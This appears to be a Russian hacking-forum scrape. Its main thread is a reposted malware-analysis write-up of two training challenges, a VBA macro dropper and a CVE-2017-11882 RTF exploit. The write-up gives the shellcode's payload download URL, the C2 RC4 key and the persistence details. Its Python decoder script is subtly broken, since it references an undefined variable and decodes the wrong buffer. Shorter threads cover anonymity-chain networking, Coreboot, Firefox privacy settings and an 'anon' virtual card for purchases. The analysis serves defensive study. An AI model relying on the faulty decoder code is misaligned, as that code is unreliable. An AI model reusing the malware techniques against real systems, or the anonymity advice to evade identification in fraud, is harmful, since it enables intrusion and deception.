olevba — для извлечения и анализа исходного кода макросов VBA из документов MS Office (OLE и OpenXML);

oledump — для анализа потоков данных OLE-файла;

rtfdump — для анализа файлов формата RTF;

rtfobj — для извлечения встроенных объектов из файлов RTF;

scdbg — для анализа шелл‑кода, утилита построена на основе библиотеки для эмуляции libemu.

Все необходимые для анализа вредоносных документов утилиты находятся в каталоге FLARE\Office виртуальной машины под управлением Windows 10. А описание общего подхода к этому самому анализу можно найти в памятке Ленни Зельцера.

Итак, приступим к изучению файлов с сайта CyberDefenders. Я не буду приводить ответы на вопросы из заданий — повторив все описанные ниже эксперименты, ты сможешь найти их сам.

OBFUSCATED

Загрузим с сайта архив с заданием. Первым делом посчитаем хеш MD5 содержащегося в архиве файла (в результате получится значение 49b367ac261a722a7c2bbbc328c32545) и проверим его на VirusTotal.

Теперь получим информацию о структуре вредоносного документа. Для этого воспользуемся утилитой oleid.

Code:Copy to clipboard

oleid 49b367ac261a722a7c2bbbc328c32545

![Информация об объекте исследования](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F3e7766acd5b154b6d8fdda832760d169%2F24241%2F1.png&hash=97edea494809d9d41e574a0eec76c6fe)
Тулза определила, что это документ Microsoft Office Word и в нем есть VBA- макрос. Его нам предстоит вытащить наружу. Для начала воспользуемся утилитой oledump и посмотрим, в каком потоке OLE содержится VBA-макрос.

Code:Copy to clipboard

oledump 49b367ac261a722a7c2bbbc328c32545

![Потоки исследуемого документа](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F3e7766acd5b154b6d8fdda832760d169%2F24242%2F2.png&hash=cce262dac1fa10172b6cf2e405d86a13)
Макрос спрятался в восьмом потоке данных. Выгрузим его при помощи инструмента olevba с ключом -a.

Code:Copy to clipboard

olevba -a 49b367ac261a722a7c2bbbc328c32545

![Результат работы утилиты olevba](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F3e7766acd5b154b6d8fdda832760d169%2F24243%2F3.png&hash=2e6bd9ae81c125ecda5aa077d709c756)
В потоке Macros/VBA/Module1 сосредоточена основная функциональность вредоносного скрипта. Из вывода утилиты видно, какие функции он использует. Давай извлечем этот скрипт и начнем исследовать код.

Code:Copy to clipboard

olevba -c 49b367ac261a722a7c2bbbc328c32545

![Участок обфусцированного кода вредоносного VBA- макроса](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F3e7766acd5b154b6d8fdda832760d169%2F24244%2F4.png&hash=acad61d0a4a31770ea4d3363cdd690ca)
Функция AutoOpen() запускает выполнение скрипта, когда документ открывают. Чтобы усложнить нам работу, злоумышленники обфусцировали код VBA-макроса: имена переменных представлены в формате Base64. Мы будем вручную деобфусцировать код и разберем его функциональность.

Для деобфускации VBA-макроса можно воспользоваться утилитой ViperMonkey, которая эмулирует выполнение сценария, но сегодня проведем ручной анализ.

Начнем с функции AutoOpen().

![Участок кода функции AutoOpen](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F3e7766acd5b154b6d8fdda832760d169%2F24245%2F5.png&hash=ec8b3d35adba7cf000b1510a7b751147)
На картинке ты видишь выделенный фрагмент кода, содержащий несколько очень интересных функций. Функция FileLen(ActiveDocument.FullName) получает размер документа Word и записывает его в переменную N18Eoi6OG6T2rNoVl41W. Функция Open(ActiveDocument.FullName) открывает документ в бинарном формате, затем записывает его содержимое в переменную E2kvpmR17SI и преобразует считанные строки в кодировку Unicode.

Во втором выделенном блоке с использованием объекта vbscript.regexp выполняется поиск такой строки в открытом файле:

Code:Copy to clipboard

MxOH8pcrlepD3SRfF5ffVTy86Xe41L2qLnqTd5d5R7Iq87mWGES55fswgG84hIRdX74dlb1SiFOkR1Hh

В переменной Y5t4Ul7o385qK4YDhr хранится указатель на первый символ найденной строки в исходном документе.

![Продолжение участка кода функции AutoOpen](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F3e7766acd5b154b6d8fdda832760d169%2F24246%2F6.png&hash=61279e65165e7a2fad7feb0885c015f4)
Обфусцированный вредоносный код расположен после обнаруженной нами строки, его размер составляет 16 827 байт.

![Начало полезной нагрузки](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F3e7766acd5b154b6d8fdda832760d169%2F24247%2F7.png&hash=f79095b1c25bb4ecf3865e72c3827bc3)
Из файла считывается информация начиная с байта 0x503c, далее декодируется по алгоритму, который мы разберем ниже, и сохраняется в файл %appdata%\Microsoft\Windows\maintools.js. Затем с помощью WScript.Shell выполняется JS-скрипт maintools.js с параметром EzZETcSXyKAdF_e5I2i1.

Давай разберем алгоритм декодирования и напишем небольшую программу на Python для получения исходного JS-скрипта.

![Функция декодирования полезной нагрузки](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F3e7766acd5b154b6d8fdda832760d169%2F24248%2F8.png&hash=3e8f58021d2f7163e01a576da794f53c)
Для удобства чтения кода я переименовал переменные. Алгоритм декодирования очень прост. С каждым байтом выполняется операция XOR (исключающее «или») с ключом, который хранится в переменной KEY. После каждого преобразования байта изменяется и сам ключ.

Напишем собственный скрипт для декодирования полезной нагрузки, используя Python 3.

Code:Copy to clipboard

import re def Decode(bVar): # Алгоритм декодирования полезной нагрузки result = "" key = 45 for i in range(0,len(bVar)): result += chr(bVar[i] ^ key) key = (key ^ 99) ^ (i % 254) return result reg = b"MxOH8pcrlepD3SRfF5ffVTy86Xe41L2qLnqTd5d5R7Iq87mWGES55fswgG84hIRdX74dlb1SiFOkR1Hh" f = open("49b367ac261a722a7c2bbbc328c32545","rb") w = open("maintools.js","w") # Файл для записи раскодированной полезной нагрузки data_read = f.read() start = re.search(reg,data).span()[1] # Начало полезной нагрузки stop = start + 16827 # Конец полезной нагрузки data1 = data_read[start:stop] w.write(Decode(data)) f.close() w.close()

Этот скрипт находит строку MxOH8... в исследуемом документе и считывает данные размером 16 827 байт. Далее по алгоритму, реализованному в функции Decode, он расшифровывает полезную нагрузку и сохраняет результат в файл maintools.js.

Итак, с помощью нашей программы мы вытащили расшифрованный JS-сценарий. Посмотрим, что у него внутри?

![Основной код вредоносного скрипта до преобразования переменных](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F3e7766acd5b154b6d8fdda832760d169%2F24249%2F9.png&hash=8104f86382664aaff998d3f2d9598fe6)
В переменную wvy1 сохраняются аргументы командной строки. Функция y3zb() возвращает основную полезную нагрузку, которая преобразуется по определенному алгоритму. Рассмотрим эту функцию повнимательнее.

![Участок кода, содержащий полезную нагрузку](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F3e7766acd5b154b6d8fdda832760d169%2F24250%2F10.png&hash=f792d3334b3061cca7c9c4a45c052679)
В переменной qGxZ хранится основной вредоносный код, который перед выполнением декодируется. Но чтобы понять принцип расшифровки, сначала переименуем название переменных в скрипте — просто ради удобства.

![Основной код после преобразования переменных](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F3e7766acd5b154b6d8fdda832760d169%2F24251%2F11.png&hash=877e698d47bde066ee1a22f57535fddd)
В функции LXv5 реализован алгоритм декодирования Base64, поэтому переименуем ее в Base64_decode. Функция CpPT содержит алгоритм шифрования RC4, дадим ей имя RC4(). Этой функции в качестве аргумента передается строка EzZETcSXyKAdF_e5I2i1, которая является аргументом командной строки и одновременно ключом для деобфускации полезной нагрузки. А расшифрованный код JavaScript выполняет функция eval.

![Участок кода, в котором реализован алгоритм шифрования RC4](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F3e7766acd5b154b6d8fdda832760d169%2F24252%2F12.png&hash=defdc5d34f18fb7d0164927798c6138b)
В первых двух циклах реализован алгоритм Key-scheduling algorithm, с помощью которого в дальнейшем генерируется ключ. Напишем скрипт на Python 3, расшифровывающий полезную нагрузку из переменной qGxZ функции y3zb().

Code:Copy to clipboard

from Crypto.Cipher import ARC4 import base64 payload = "zAubgpaJRj0tIneNNZL0 ... rbhue4N84o9YPBy/SFieRfjQP5lsrSZWJKNJ5ZSbf06ZO4="; key = b"EzZETcSXyKAdF_e5I2i1" rc4 = ARC4.new(key) decode = rc4.decrypt(base64.b64decode(payload)) w = open('result.js','wb') w.write(decode) w.close()

После преобразования полезной нагрузки мы получили еще один код JavaScript, в котором и реализована основная функциональность.

![Участок полученного JavaScript- кода](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F3e7766acd5b154b6d8fdda832760d169%2F24253%2F13.png&hash=63c1d66d2fc66b9d98aca3c17d4061e5)
Этот сценарий собирает информацию о скомпрометированной системе и отправляет ее на управляющие серверы.

![Заголовок отправляемых данных](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F3e7766acd5b154b6d8fdda832760d169%2F24254%2F14.png&hash=e19c7cf0c96464ac8a9502e6cb313b7b)
Из рисунка выше виден заголовок, который формируется для отправки данных методом POST.

![Метод закрепления в системе](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F3e7766acd5b154b6d8fdda832760d169%2F24255%2F15.png&hash=dac1e88d654004b51fe1aa478ee71ec9)
После запуска вредоносный скрипт копирует себя в следующую папку:

Code:Copy to clipboard

C:\Users\<Пользователь>\AppData\Local\Microsoft\Windows

А затем создает в планировщике задач Windows новую задачу, которая запускается при входе пользователя в систему. Задача имеет имя Task Manager, описание Windows Task Manager, а сам скрипт запускается из каталога WPD. Найти в системе это задание можно с помощью команды schtasks /query /fo csv /v, а еще можно просто зайти в папку C:\Windows\System32\Tasks и отыскать в ней подкаталог WPD. Весь свой трафик сценарий шифрует алгоритмом RC4 с ключом 2f532d6baec3d0ec7b1f98aed4774843. Для запуска JS-скрипта используется утилита командной строки cscript.exe.

EMPRISA MALDOC

Разберем задание с вредоносным документом в формате Microsoft Rich Text Format (RTF). Такие файлы очень часто используются злоумышленниками при фишинговых атаках и, как правило, содержат эксплоиты.

Для начала соберем информацию об объекте исследования с помощью утилиты rtfobj.

Code:Copy to clipboard

rtfobj c39-EmprisaMaldoc.rtf

![Вывод работы утилиты rtfobj](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F3e7766acd5b154b6d8fdda832760d169%2F24256%2F16.png&hash=ec4f534ea577c921728bf711738594f2)
Тулза определила, что RTF-документ содержит встроенный объект. Для выполнения вредоносного кода используется уязвимость CVE-2017-11882 , эксплуатирующая переполнение буфера в редакторе Microsoft Equation. Проанализируем этот файл с помощью утилиты rtfdump.

Code:Copy to clipboard

rtfdump c39-EmprisaMaldoc.rtf

![Объекты, расположенные в исследуемом файле](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F3e7766acd5b154b6d8fdda832760d169%2F24257%2F17.png&hash=e0da3206bc09794a8b3dd12270ae867a)
Как видно из рисунка, в документе спрятан объект с именем Equation.e, magic- байт d0cf11e0. Исследуем поток 7, затем выгрузим из него OLE-объект и сохраним в файл objrtf.

Code:Copy to clipboard

rtfdump c39-EmprisaMaldoc.rtf -s 7 -H -E -d > objrtf

Полученный OLE-объект можно изучить при помощи утилиты oledump.

Code:Copy to clipboard

oledump objrtf

![Анализ OLE-объекта](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F3e7766acd5b154b6d8fdda832760d169%2F24258%2F18.png&hash=4da0e645fc7d6216bd0514464bd55411)
После строки Equation Native в шестнадцатеричном представлении содержится обфусцированный шелл‑код. Сохраним его дамп в файл shell.

Code:Copy to clipboard

oledump objrtf -s 4 -d > shell

![Шестнадцатеричное значение шелл- кода](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F3e7766acd5b154b6d8fdda832760d169%2F24259%2F19.png&hash=0039efd3fc394254ab28195305f47293)
Чтобы разобраться, как работает этот шелл‑код, нам понадобится утилита scdbg. Запустим ее с параметром /findsc, который эмулирует выполнение шелл‑кода при каждом смещении в файле.

Code:Copy to clipboard

scdbg /f shell findsc

![Эмуляция вредоносного шелл-кода](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F3e7766acd5b154b6d8fdda832760d169%2F24260%2F20.png&hash=64cfa04cb0ffdba0e158ab58fd729b81)
Функция LoadLibraryA загружает динамическую библиотеку urlmon.dll. Далее с использованием функции URLDownloadToFileA из этой библиотеки с ресурса raw.githubusercontent.com скачивается полезная нагрузка и сохраняется в файл o.exe. Затем выполняется выход из процесса с помощью функции ExitProcess.

Получим полезную нагрузку и посмотрим, что это такое. Адрес следующий:

Code:Copy to clipboard

https://raw.githubusercontent.com/accidentalrebel/accidentalrebel.com/gh-pages/theme/images/test.png

Поведенческий анализ вредоносного документа

Зайдем в виртуальную машину Kali Linux, перейдем в каталог /var/lib/inetsim/http/fakefiles и сохраним полезную нагрузку под именем sample.png.

![Полезная нагрузка, сохраненная в файл-заглушку Inetsim](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F3e7766acd5b154b6d8fdda832760d169%2F24261%2F21.png&hash=84080d0f55e719205dd0717d1fab8bf8)
Вернемся в виртуальную машину с Windows 10, установим Microsoft Office и откроем в нем исследуемый файл c39-EmprisaMaldoc.rtf, чтобы проанализировать его поведение.

Если файл открыть, запустится дочерний процесс EQNEDT32.EXE (компонент MS Office, отвечающий за вставку и редактирование объектов OLE в документы). Уязвимость срабатывает, когда EQNEDT32.EXE пытается скопировать имя шрифта в локально созданный буфер. Размер буфера составляет всего 40 (0x28) байт, однако, если имя шрифта длиннее 40 байт, буфер и регистр EBP переполнятся, а адреса возврата будут перезаписаны. Когда функция завершит выполнение, поток управления доставится по назначенному злоумышленником адресу.

Выполняющийся таким образом шелл‑код загружает полезную нагрузку из виртуальной машины Kali Linux (файл sample.png) и сохраняет по пути C:\o.exe. После запуска этого исполняемого файла появляется модальное окно, содержащее флаг.

![Вывод полезной нагрузки](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F3e7766acd5b154b6d8fdda832760d169%2F24262%2F22.png&hash=5b367febbfc430b0aa4599aee26a7a64)
Давай посмотрим, какое имя шрифта загружается процессом, когда открывают вредоносный документ. Для этого запустим Proccess Hacker 2, откроем документ, найдем процесс Winword.exe и перейдем на вкладку Memory. В памяти отыщем обращение к папке C:\Windows\Fonts и увидим, что процесс пытается загрузить шрифт times.ttf. Значит, это шрифт Times New Roman.

ВЫВОДЫ

На этих двух примерах мы рассмотрели методику исследования подозрительных документов, которые распространяются злоумышленниками по электронной почте при фишинговых атаках. На GitHub можно найти РОС для рассмотренной нами эксплуатации уязвимости CVE-2017-11882, который выполняет шелл‑код по адресу в памяти 0x00402114. Microsoft закрыла эту уязвимость, выпустив патч KB4011604. Не забудь установить это обновление, чтобы обезопасить себя от подобной атаки.

Автор @rayhunt454
xakep.ru

Форензика. Теория и практика расследования киберпреступлений

ID: 676533bbb4103b69df371b8c
Thread ID: 40266
Created: 2020-07-31T18:26:31+0000
Last Post: 2021-10-22T01:50:44+0000
Author: tabac
Prefix: Мануал/Книга
Replies: 3 Views: 2K

Автор Шелупанов Александр Александрович, Смолина Анна Равильевна
Год издания 2020
Размер 206МБ
Язык Русский

Представлен анализ существующих подходов в современной отечественной практике расследования киберпреступлений. На основе накопленного практического опыта проведения экспертиз преступлений в сфере высоких технологий предложен подход по их унификации.

Для специалистов, научных работников и экспертов, занимающихся вопросами компьютерно-технической экспертизы. Будет полезна преподавателям, аспирантам и студентам, обучающимся по направлениям в области юриспруденции, защиты информации, информационной безопасности.

Hidden content for authorized users.

![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- file.png&hash=ce6c0b08146c0d238bfdc2b2470d7b21&return_error=1)

[ 206.83 MB file on MEGA ](https://mega.nz/file/Gsg0UCya#UJc-

yvCpxxYY1c8-Jt1qlJVVI8MS0Y8pCyT9YTuv28k)

mega.nz

Виртуальные сети

ID: 676533bbb4103b69df371b8f
Thread ID: 51559
Created: 2021-05-09T08:48:27+0000
Last Post: 2021-10-19T04:23:01+0000
Author: Benihowy
Prefix: Статья
Replies: 11 Views: 2K

(Наверное, эта статья станет неким дополнением к статье «Развертывание “анонимной цепочки” любой сложности на Hyper-V»)
С точки зрения безопасности стоит разделять сеть на несколько подсетей – внутренняя, внешняя и смешанная. В свою очередь внутренняя тоже может делится (в зависимости от необходимости). Все это делается для минимизации рисков, если какая-то виртуальная машина будет заражена вирусом либо захвачена злоумышленником.
- К внешней отнесем те машины, которые будут выходить в интернет напрямую. Они являются более уязвимы по умолчанию, ведь соединены с модемом и могут иметь внешний ip адрес. Такая сеть должна быть изолирована от хостовой машины и любой другой виртуальной машины, которая не является роутером для этой сети.
- К внутренним отнесем машины, которые не имеют выхода в интернет или в другую «смешанную сеть». Например, хранение паролей keepass, и любой другой важной информации на виртуальной машине.
- К смешанным отнесем те машины, которые не могут напрямую (через основной шлюз) выйти в интернет, но выходят в него через роутеры.
Создать виртуальную сеть довольно легко. Количество сетей зависит от количества экранируемых зон. У каждого их может быть разное число

Это не означает, что для каждой машины должна быть своя сеть. На скриншоте выше показаны группы сетей, которыми пользуются мои виртуальные машины. Для достижения полной экранировки браузеров от приложений, мы разделили трафик между несколькими машинами (вконтакте отдельно, ютуб отдельно, торрент и т.д.). Также нужно разделить и сети. Если мы соединим все эти машины в одну сеть, то подвергаем себя еще неким совпадениям, а именно, одной и той же подсети на нескольких сервисах

В браузере webrtc способен узнать локальные ip. Его можно и нужно отключать (в firefox еще не известно, какие есть способы добычи информации про локальные ip кроме webrtc). Если к примеру, взять браузер хром или мессенджер телеграмм, вайбер; их функции сбора данных скорей всего будут включать полную информацию про сетевые подключения виртуальной машины на которой они установлены. И помешать такому сбору данных будет скорей всего невозможна. Суть анонимности – смешаться с толпой и не выделятся всеми возможными способами. А вот имея две локальные сети 192.168.10.0 и 192.168.0.0 – это очень сильно сужает круг лиц из всего мира, которые используют точно такие же сети, с такой операционной системой, браузером и разрешением экрана.
Рассмотрим на примере простого пользователя интернета. Он не занимается фильтрацией своего трафика, подменой ip через впн’ы, а просто использует настройки по умолчанию. Интернет поступает в дом на модем, патом через nat передает его на компьютер. Модем (роутер) состоит в двух сетях, с одной стороны провайдер, а с другой сам пользователь. Самая частая комбинация октетов для модема 192.168.1.1 либо 192.168.0.1, а для пользователя последний октет обычно имеет двойку. Поэтому и виртуальные сети нужно подгонять под такие шаблоны.
На своем примере покажу расстановку сетей на ключевых виртуальных машинах. Машина Wan имеет 3 сетевые карты

Две первые сетевые карты принимают трафик от других машин и отсылают его в интернет через третий адаптер, который подключен к модему (репликация). Далее идут роутеры, их не будем рассматривать, там все происходит аналогичным образом: один адаптер принимает трафик на прокси сервер. Затем пропускает трафик последовательно или параллельно через тор. Тор в свою очередь подключается к интернету через другой адаптер. Если говорить простыми словами, то имеем три роутера. Трафик идет от третьего роутера ко второму, и потом к первому последовательно. Трафик от третьего к первому никак пойти не сможет, так как эти роутеры находятся в разных подсетях. Рассмотрим конечную машину, на которой крутится браузер с вк

Основная сеть тут 192.168.1.0, а 192.168.10.0 вспомогательная, и используется только для удаленного управления этой машиной (vnc). Если взять другую машину, то там будет аналогичная ситуация

Как видим, эти обе машины (wan и forum) якобы находятся в одной подсети и имеют одинаковые ip (192.168.1.2). Но это не так, ведь название сетей разные, а значит они никак не пересекаются.
В этих двух случаях машины с адресами 192.168.1.1 принимают трафик. Для вк одна, а для форума другая машина. Разумеется, на скриншотах мы видим некое сходство в название сети vnc network (192.168.10.0). Такого лучше не иметь, но это нужно мне для упрощения работы с машинами.
С браузерами разобрались, теперь рассмотрим мессенджеры. Не известно какую информацию собирает телеграмм, но предположим, что он в курсе какое у нас железо. Мы создали сетевое подключение, которое нечем не примечательно, и тут возникает дилемма. А как насчёт процессора? Ведь его нельзя виртуализировать. Можно изменить количество ядер, уменьшить мощность на ядро, но он будет иметь одинаковое название как на виртуальной машине, так и на реальной. Если наш процессор достаточно уникален, например, xeon первого поколения (E5-2630L), то при использовании viber’а, либо whatsapp процессор также будет доступен для сбора информации о железе. И не важно, запустим мы его на реальной машине хоста либо на виртуальной, этого же хоста. Всю эту деятельность можно связать воедино с помощью уникальности процессора. Некоторые мессенджеры можно запускать прямо из браузера, это очень сильно помогает. Ведь браузер firefox пока что не может читать железо, на котором установлен (либо может, но мы об этом не знаем). Поэтому использование «браузерной» версии мессенджера дает больше анонимности чем десктоп версия.
Есть еще некие настройки самых адаптеров. Дело в то по умолчанию установлено много разрешений на сетевую деятельность операционной системе. И появляются некие нежелательные моменты. Такие как случайное открытие шары с хостовой машины или подключение к интернету миную цепочки проксей. Все это может быть последствием настроек «по умолчанию» для сетевых карт. Чтобы трафик ходил по сети на другие машины (не широковещалки) нужна «карта». Называется она таблицей маршрутизации, в ней указываются все маршруты

Запуская любое сетевое приложение (браузер) трафику некуда идти. Ведь маршрут не установлен. За него отвечает «основной шлюз» в настройке самого сетевого подключения

Имея пустой эту строку мы себя полностью защитим от нежелательного трафика (это не панацея и на некоторых машинах все же нужно ставить файервол). Также нужно убрать остальные галочки в подключении и оставить только необходимые

Всю связь осуществляем через прокси сервер (ccproxy) и проксификатор (proxifier)

Что такое Coreboot, и чем он может быть полезен

ID: 676533bbb4103b69df371ba9
Thread ID: 55079
Created: 2021-08-09T20:05:23+0000
Last Post: 2021-09-08T18:31:38+0000
Author: Arg0s
Prefix: Статья
Replies: 3 Views: 2K

В данной статье я хотел бы рассказать о том, какие преимущества вы можете получить, используя Coreboot вместо BIOS
Сразу хочу сказать, что в данной статье не будет рассматриваться процесс установки Coreboot(это материал для отдельной статьи)
Начнем с основ, для начала стоит понять, что такое BIOS(Basic Input/Output System - базовая система ввода-вывода)
BIOS - это программа, записанная на отдельную микросхему в вашем компьютере, которая обеспечивает работу системы с вашим оборудованием, BIOS имеет закрытый исходный код, соответственно мы не можем проверить то, насколько он безопасный
Coreboot - это открытый аналог BIOS, но некоторые участки кода Coreboot берутся из заводского BIOS вашего устройства.
Есть так же полностью свободная альтернатива BIOS, называется она Libreboot.
Libreboot , в отличии от Coreboot, не имеет закрытых компонентов, но официально Libreboot поддерживает только загрузку Linux систем(есть информация об успешной загрузке OpenBSD)
Так же Libreboot поддерживает очень мало устройств, и они все уже достаточно старые(Пример нотубуков, поддерживающих Libreboot - Lenovo ThinkPad X60, X60s, X60 Tablet, X200, X200 Tablet, R400, T400, T500).
В случае с Coreboot, можно найти относительно более современные ноутбуки(установкой Coreboot на стационарные компьютеры я никогда не занимался, но есть современные материнские платы supermicro, на которые можно поставить Coreboot)
Рассмотрим ноутбуки, на которые можно установить Coreboot - Lenovo ThinkPad X201, X220, X230, T420, T430, T440p
Если решите поэксперементировать и провести пару увлекательных вечеров(иногда и ночей) за прошивкой, то из этого небольшого списка , я советую выбирать ThinkPad X230 или ThinkPad T440p.
Если вам нужна UEFI загрузка, вы можете использвать полезную нагрузку TianoCore.
Для прошивки нам понадобиться сам ноутбук, другой компьютер, программтор _CH341A и прищепка _SOIC8__(некоторые используют программатор + Raspberry Pi, я же описываю самый дешевый и простой метод, которым сам пользуюсь)
Вот так будет выглядеть на прогграмматор с прищепкой:

Все эти компоненты можно приобрести на AliExpress или EBay где-то за 5$
Теперь перейдем к плюсам, которые мы получим при установке Coreboot:
-Более безопасное обращение к компонентам компьютера
-В случае с ноутбуками Lenovo ThinkPad, удаляется whitelist Wi-Fi адаптеров
-Удаляется Intel ME
-Загрузка происходит немного быстрее
-Настоящее полнодисковое шифрование, включая раздел /boot(выбираем GRUB, в качстве полезной нагрузки)

Так же вы получите опыт работы с программатором, который может пригодиться в других проектах.
К тому же Coreboot поддерживается в QEMU, вы можете запускать свои виртуальные машины с полнодисковым шифрованием(когда-нибудь напишу большую статью, по созданию защищенной виртуальной машины с Linux, с помощью KVM и Coreboot + Tor-шлюз на FreeBSD)
На этом ознакомление с Coreboot заканчивается, конкретный пример с прошивкой напишу попозже, а пока, надеюсь, вы узнали для себя что-то новое.
Всем удачи в прошивке!

Аnon VCC BMW для покупок

ID: 676533bbb4103b69df371bbd
Thread ID: 55720
Created: 2021-08-23T03:09:20+0000
Last Post: 2021-08-23T03:09:20+0000
Author: Tubu
Prefix: Статья
Replies: 0 Views: 2K

[ BMW - официальный сайт в России ](https://www.bmw.ru/ru/Online/online-

entertainment/bmw-virtual-card.html)

Автомобили BMW – выберите свой BMW на официальном сайте. Информация об акциях, новинках и ценах BMW в России. Узнайте где купить или запишитесь на тест-драйв у ближайшего дилера BMW.

www.bmw.ru

Как настроить Firefox для повышения приватности

ID: 676533bbb4103b69df371d68
Thread ID: 28143
Created: 2019-03-05T16:05:42+0000
Last Post: 2019-03-05T16:29:24+0000
Author: tabac
Prefix: Статья
Replies: 1 Views: 2K

Как настроить Firefox для повышения приватности

В последнее время браузер Firefox претерпевал достаточно значительные изменения, хорошие и не очень: это и переход на движок Quantum, это и отказ от расширений типа XUL/XPCOM, и переход на WebExtensions, и еще масса других преобразований. Что никак не изменилось — это возможность сделать из него прекрасный хакерский браузер, если немного покрутить конфиги. Как и что крутить, мы обсудим в этой статье.

Quantum, новый движок Firefox, предполагает постепенное обновление всех компонентов браузера, чтобы увеличить скорость работы и уменьшить потребляемую память.

Создание «портативных» настроек

Все интересные настройки Firefox делаются на служебной странице по адресу about:config. Зайти сюда и поменять пару параметров — легко и удобно. Но если говорить о тонкой настройке, то тут менять значения по одному становится слегка утомительно.
Как автоматизировать процесс, не прибегая к сторонним утилитам? Очень просто: создавай файл user.js и прописывай все настройки туда. Далее помещаем этот файл в каталог пользовательского профиля Firefox, который в Windows находится по пути C:\Users\[username]\AppData\Roaming\Mozilla\Firefox\Profiles\[random].default. Формат записей в этом файле прост: например, чтобы включить поддержку WebP, необходимо задать параметру image.webp.enabled значение true. В файле настроек это будет выглядеть вот так:

Code:Copy to clipboard

user_pref("image.webp.enabled", true);

Другими словами, в шаблоне user_pref("...", …); идет параметр и его значение. Итак, с файлом настроек разобрались, теперь приступим к препарированию браузера. Все настройки применялись к последней на момент написания статьи версии браузера.

Отключаем все лишнее

WebRTC и Pocket
Mozilla внедрила сервисы WebRTC и Pocket в Firefox и включила их по умолчанию. Многим это не понравилось, и не просто так: в Pocket нашли уязвимости, а WebRTC может допускать утечку IP-адреса при определенных обстоятельствах. Давай отключим и то и другое! Сейчас и далее я привожу готовые строки настроек, которые ты можешь копировать в файл user.js.

Code:Copy to clipboard

// Отключаем Pocket user_pref("extensions.pocket.api", ""); user_pref("extensions.pocket.enabled", false); user_pref("extensions.pocket.site", ""); user_pref("extensions.pocket.oAuthConsumerKey", ""); // Отключаем WebRTC user_pref("media.peerconnection.enabled", false); user_pref("media.peerconnection.ice.default_address_only", true); user_pref("media.peerconnection.ice.no_host", true); user_pref("media.peerconnection.ice.relay_only", true); user_pref("media.peerconnection.ice.tcp", false); user_pref("media.peerconnection.identity.enabled", false); user_pref("media.peerconnection.turn.disable", true); user_pref("media.peerconnection.use_document_iceservers", false); user_pref("media.peerconnection.video.enabled", false); user_pref("media.peerconnection.default_iceservers", "[]");

Геолокация

Отключаем доступ к геолокации.

Code:Copy to clipboard

user_pref("geo.enabled", false); user_pref("geo.provider.ms-windows-location", false); user_pref("geo.wifi.uri", "");

Статистика использования браузера и различные метрики

Перекрываем сбор различных данных.

Code:Copy to clipboard

// Отключаем асинхронные запросы, используемые для аналитики user_pref("beacon.enabled", false); user_pref("browser.send_pings", false); user_pref("browser.send_pings.require_same_host", false); // Отключаем метрики производительности user_pref("dom.enable_performance", false); user_pref("dom.enable_performance_observer", false); user_pref("dom.enable_performance_navigation_timing", false); user_pref("browser.slowStartup.notificationDisabled", false); user_pref("network.predictor.enabled", false); user_pref("network.predictor.enable-hover-on-ssl", false); user_pref("network.prefetch-next", false); user_pref("network.http.speculative-parallel-limit", 0); // Информация об установленных дополнениях user_pref("extensions.getAddons.cache.enabled", false);

Отключаем доступ к датчикам

Если у тебя обычный ПК, а не планшет, к примеру, то выключаем доступ к датчикам.

Code:Copy to clipboard

user_pref("device.sensors.enabled", false); user_pref("device.sensors.orientation.enabled", false); user_pref("device.sensors.motion.enabled", false); user_pref("device.sensors.proximity.enabled", false); user_pref("device.sensors.ambientLight.enabled", false);

Останавливаем фингерпринтинг

Эти настройки говорят браузеру сопротивляться идентификации.

Code:Copy to clipboard

user_pref("dom.webaudio.enabled", false); user_pref("privacy.resistFingerprinting", true);

Перекрываем информацию о сетевом соединении

Code:Copy to clipboard

user_pref("dom.netinfo.enabled", false); user_pref("dom.network.enabled", false);

Отключаем использование устройств и передачу медиа

Отключаем использование через браузер камер, микрофонов, геймпадов, очков виртуальной реальности и вместе с устройствами — передачу различного медиаконтента, типа скриншотов и прочего. Так же выключаем распознавание речи.

Code:Copy to clipboard

